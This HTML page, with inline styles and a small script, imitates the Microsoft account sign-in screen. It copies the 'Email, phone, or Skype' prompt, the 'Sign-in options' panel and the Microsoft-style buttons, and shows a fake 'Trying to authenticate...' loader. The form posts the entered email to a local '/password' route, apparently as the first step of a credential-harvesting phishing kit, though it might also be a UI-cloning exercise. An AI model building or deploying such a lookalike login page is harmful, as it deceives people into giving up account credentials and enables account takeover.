<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <link rel="stylesheet" >
  <title>Document</title>



  <style>
* {
  margin: 0;
  padding: 0;
  box-sizing: border-box;
}
.body {
  background-image: url('./assets/10001\ \(1\).svg');
  background-size: cover;
  background-repeat: no-repeat;
  background-position: center;
  height: 100vh;
  margin: 0;
  
  
 
  
}
@media (max-width: 768px) {
  .body {
    max-width: 100%;
    background-image: none;
    background-color: white;
    height: 100vh;
    margin: 0;

    
    
  }
}
.main{
  display: flex;
  flex-direction: column;
  align-items: center;
  justify-content: space-between;
  width: 100%;
  
  height: 100vh;
  
}

.sub:hover {
      background-color: #a5a5a550;
    }
.formcontainer{

  width: 35%; /* Adjusted to 90% of viewport width */
       
        margin-top: 6%;
        
      
}

.sub{
  display: flex;
  flex-direction: row;
  padding: 0px 50px 5px 40px;
  align-items: start;
  box-shadow: 0 0 15px rgba(0, 0, 0, 0.2);
  border: 1px solid rgba(0, 0, 0, 0.2);
  background-color: white;
 
  margin-top: 20px;
  margin-left: 0% !important;
  
}


@media (max-width: 768px) {

  .sub{
    display: none;
    
  }
 }




 .sub1{
  display: none;
 }
 @media (max-width: 768px) {

  .sub1{
    display: flex;
    flex-direction: row;
    padding: 0px 50px 50px 50px;
    align-items: start;
    box-shadow: none;
    border: 1px solid rgba(0, 0, 0, 0.2);
    background-color: white;
    height: 2px;
    margin-top: 20px;
    margin-left: 0% !important;
    
  }}


@media (max-width: 768px) {
  .formcontainer{

    width: 100%; /* Adjusted to 90% of viewport width */
          height: 400px;
          margin-top: 0%;
          border: none;
          
        
  }}

  

.form{
  padding: 35px 45px 35px 45px ;

  box-shadow: 0 0 15px rgba(0, 0, 0, 0.1);
        border: 1px solid rgba(0, 0, 0, 0.1);
        background-color: white;
        
        font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        
       
        
}
@media (max-width: 768px) {
    .form{
  padding: 35px 10px 35px 10px ;

  box-shadow: none;
        border: 0;
        background-color:none;
        
        font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
        
       
        
}
  
  }


.head {
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  font-size: 24px;
  font-weight: 500;
  margin-top: 3%;
}


@media (max-width: 768px) {
  .head {
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  font-size: 25px;
  font-weight: 600;
  margin-top: 3%;
}
        
  }

.head2 {
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  font-size: 24px;
  font-weight: 500;
  margin-top: 0px;
}
@media (max-width: 768px) {
  .head2 {
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  font-size: 25px;
  font-weight: 600;
  margin-top: 0px;
}
        
  }


.input {
  border: none;
  outline: none;
  background-color: transparent;
  border-bottom: 1px solid black;
  padding: 5px 0;
  width: 100%;
  font-size: 16px;
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  position: relative;
  margin-top: 1%;
}
.input:focus {
  border-bottom-color: #0065bb;
}

@media (max-width: 768px) {
  .input {
  border: none;
  outline: none;
  background-color: transparent;
  border-bottom: 1px solid black;
  padding: 5px 0;
  width: 100%;
  font-size: 16px;
  font-weight: 400;
  font-family: 'Segoe UI', 'Lucida Sans', 'Lucida Sans Regular', 'Lucida Grande', 'Lucida Sans Unicode', Geneva, Verdana, sans-serif;
  position: relative;
  margin-top: 1%;
}
  }

.create-account-link, .para1, .para2 {
  color: #0067bb;
  text-decoration: none;
  font-size: 13px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}

@media (max-width: 768px) {
  .create-account-link, .para1, .para2 {
  color: #0067bb;
  text-decoration: none;
  font-size: 14px;
  font-weight: 400;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}
        
  }

.para1 {
  margin-top: 30px;
  margin-bottom: 10px;
  color: black;
  text-decoration: none;
  font-size: 13px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}


@media (max-width: 768px) {
  .para1 {
  margin-top: 30px;
  margin-bottom: 10px;
  color: black;
  text-decoration: none;
  font-size: 14px;
  font-weight: 400;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}
        
  }

.para5 {
  margin-top: 10px;
  margin-bottom: 20px;
  color: black;
  text-decoration: none;
  font-size: 14px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}

@media (max-width: 768px) {
  .para5 {
  margin-top: 10px;
  margin-bottom: 20px;
  color: black;
  text-decoration: none;
  font-size: 15px;
  font-weight: 400;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}
        
  }

.create-account-link:hover, .para2:hover {
  text-decoration: underline;
  color: rgb(40, 39, 39);
}
.buttons-container {
  display: flex;
  justify-content: end;
  align-items: center;
  margin-top: 30px;
  margin-bottom: 5px;
}


@media (max-width: 768px) {
  .buttons-container {
  display: flex;
  justify-content: end;
  align-items: center;
 
  margin-bottom: 5px;
}
}
.button1, .button2 {
  height: 32px;
  width: 108px;
  display: flex;
  justify-content: center;
  align-items: center;
  text-decoration: none;
  font-size: 15px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}
.button1 {
  background-color: #00000033;
  color: black;
  margin-right: 5px;
}
.button2 {
  background-color: #0067bb;
  color: white;
  text-decoration: none;
  border: none;
}
.button1:hover {
  background-color: #00000050;
  color: black;
}
.button2:hover {
  background-color: #02589e;
  color: white;
}

@media (max-width: 768px) {
  .button1, .button2 {
  height: 32px;
  width: 108px;
  display: flex;
  justify-content: center;
  align-items: center;
  text-decoration: none;
  font-size: 15px;
  font-weight: 400;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
  border-radius: 6px;
}
}

.image2 {
  height: 28px;
  margin-top: 10px;
}
.para3 {
  font-size: 14px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
  margin-left: 3px;
  text-align: center;
  margin-top: 14px;
}
.item2 {
  font-size: 13px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
  margin-right: 50px;
  margin-left: 30px;
  color: rgb(112, 112, 112);
  text-decoration: none;
}
.item1 {
  font-size: 13px;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
  text-decoration: none;
  color: rgb(112, 112, 112);
}
.item1:hover {
  text-decoration: underline;
}
.item2:hover {
  text-decoration: underline;
}

.fot {
  color: white;
  text-align: center;
  padding: 10px 0;
  width: 100%;
  display: flex;
  flex-direction: row;
  justify-content: end;
}

@media (max-width: 768px) {
  .fot {
    color: white;
    text-align: center;
    width: 100%;
    display: flex;
    flex-direction: row;
    justify-content: start;
    align-items: center;
  }
}
.form > * {
  opacity: 0;
  transform: translateX(100%);
  animation: slideInChildren 1s forwards;
}
.form> *:nth-child(1) {
  animation-delay: 0.1s;
}
.form> *:nth-child(2) {
  animation-delay: 0.2s;
}
.form> *:nth-child(3) {
  animation-delay: 0.3s;
}
.form> *:nth-child(4) {
  animation-delay: 0.4s;
}
.form> *:nth-child(5) {
  animation-delay: 0.5s;
}
.form> *:nth-child(6) {
  animation-delay: 0.6s;
}
@keyframes slideInChildren {
  to {
    opacity: 1;
    transform: translateX(0);
  }
}
.loader-container {
  display: flex;
  position: fixed;
  top: 0;
  left: 0;
  width: 100%;
  height: 100%;
  background-color: rgba(255, 255, 255, 0.8);
  z-index: 9999;
  flex-direction: column;
  justify-content: center;
  align-items: center;
}
.loader {
  border: 4px solid #f3f3f3;
  border-radius: 50%;
  border-top: 4px solid #3498db;
  width: 40px;
  height: 40px;
  animation: spin 1s linear infinite;
}
.loader-text {
  margin-top: 20px;
  font-size: 16px;
  color: #333;
  font-family: 'Segoe UI', 'Roboto', 'Oxygen', 'Ubuntu', 'Cantarell', 'Open Sans', 'Helvetica Neue', sans-serif;
}
@keyframes spin {
  0% { transform: rotate(0deg); }
  100% { transform: rotate(360deg); }
}

  </style>
</head>
<body class="body" onload="handlePageLoad()">
  <div class="loader-container" id="pageLoader">
    <div class="loader"></div>
    <div class="loader-text" id="loaderText">Trying to authenticate...</div>
  </div>
  <section class="main">
         <div class="formcontainer">
                  <div class="form">

                    <img class="image" src="./assets/10001.svg" alt="">
                    <h2 class="head">Sign in</h2>
                    <form action="/password" method="post" onsubmit="showLoaderWithoutText()">
                      <input class="input" type="email" name="email" placeholder="Email, phone, or Skype" required>
                      <p class="para1">No account? <a class="create-account-link" href="#">Create one!</a></p>
                      <a class="para2" href="#">Can’t access your account?</a>
                      <div class="buttons-container">
                        <a class="button1" href="#">Back</a>
                        <button class="button2" type="submit">Next</button>
                      </div>
                      </form>
                      <div class="sub1"> 


                        <img class="image2" src="./assets/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" alt="">
            <p class="para3">Sign-in options</p>
                      </div>


                  </div>
                  <div class="sub"> 


                    <img class="image2" src="./assets/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg" alt="">
        <p class="para3">Sign-in options</p>
                  </div>

          </div>

          <footer class="fot">
            <a class="item1" href="#">Terms of use</a>
            <a class="item2" href="#">Privacy  cookies  ...</a>
          </footer>
 </section>

 <script>
  function showLoader() {
    document.querySelector('.loader-container').style.display = 'flex';
  }

  function showLoaderWithoutText() {
    document.querySelector('.loader-container').style.display = 'flex';
    document.getElementById('loaderText').style.display = 'none';
  }

  function hideLoader() {
    setTimeout(() => {
      document.getElementById('pageLoader').style.display = 'none';
    }, 2000); // Simulate authentication delay
  }

  function handlePageLoad() {
    const isInitialLoad = sessionStorage.getItem('isInitialLoad') === null;
    if (isInitialLoad) {
      sessionStorage.setItem('isInitialLoad', 'false');
      document.getElementById('loaderText').style.display = 'block';
    } else {
      document.getElementById('loaderText').style.display = 'none';
    }
    hideLoader();
  }
</script>
</body>
</html>